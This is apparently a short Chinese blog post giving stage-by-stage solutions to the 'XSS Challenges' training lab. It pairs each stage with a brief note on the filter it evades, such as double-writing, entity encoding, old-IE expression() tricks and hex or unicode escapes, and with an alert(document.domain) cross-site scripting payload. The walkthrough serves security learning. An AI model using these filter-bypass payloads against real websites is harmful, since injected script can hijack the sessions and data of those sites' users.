XSS Challenges

Stage #1

payload:

<script>alert(document.domain);</script>

 

Stage #2

payload:

"><script>alert(document.domain);</script>

 

Stage #3

burp抓包,在p2处输入payload

payload:

</option><script>alert(document.domain)</script>

 

Stage #4

burp抓包,p3处输入payload

payload:

“><svg onload=alert(document.domain)>

 

Stage #5

更改p1处的maxlength="15"

payload:

"><script>alert(document.domain);</script>

 

Stage #6

输入<>会被替换&lt; &gt;

payload:

"onmouseover="alert(document.domain);

 

Stage #7

输入空格过滤

payload:

qwe onmouseover=alert(document.domain);

 

Stage #8

用伪协议执行script

payload:

javascript:alert(document.domain)

 

Stage #9

utf-7编码(现在基本很少使用)用旧版IE,在前端输入绕过

payload:

"onmouseover="alert(document.domain)

 

Stage #10

双写绕过

payload:

"><script>alert(document.domdomainain);</script>

 

Stage #11

过滤js脚本字符和事件字符,考虑<a>标签名

payload:

"><a href="java&#115;cript:alert(document.domain);">1</a>

 

Stage #12

利用IE浏览器的 `` 过滤

payload:

``onmouseover=alert(document.domain);

 

Stage #13

用旧版IE特性触发xss

payload:

background-color:#ffff;background:url("javascript:alert(document.domain);");

 

Stage #14

用旧版IE特性触发xss

payload:

xss:ex/**/pression(if(!window.x){alert(document.domain);window.x=1})

 

Stage #15

用16进制编码或unicode编码绕过过滤

payload:

\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

 

Stage #16

用unicode编码绕过过滤

payload:

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

 

posted @ 2020-07-12 22:31  f1veseven  阅读(113)  评论(0编辑  收藏  举报